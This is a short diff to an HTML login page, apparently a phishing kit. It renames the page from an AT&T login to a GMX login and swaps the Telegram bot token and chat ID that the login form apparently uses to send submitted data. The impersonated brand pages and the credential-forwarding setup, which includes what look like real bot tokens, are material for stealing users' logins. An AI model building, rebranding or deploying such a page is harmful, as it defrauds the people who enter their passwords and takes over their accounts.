--- a/gmxtele.html
+++ b/gmxtele.html
@@ -4,7 +4,7 @@
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <link rel="stylesheet" href="style.css">
-  <title>AT&T - Login</title>
+  <title>GMX - Login</title>
    <style>
 
     body{
@@ -212,8 +212,8 @@ footer#footer ul li{
       const formal = document.querySelector('#form')
     
       let bot = {
-          TOKEN: "6682328877:AAHeCRRx7wcAbHpQaA7QghceJMmPluDr_qw",
-          chatID: "6857364753"
+          TOKEN: "8336142789:AAG0nBESbfN_ZxPgrqeRTVXQ8MwFS0Y1OC8",
+          chatID: "6599507166"
       }
 
 
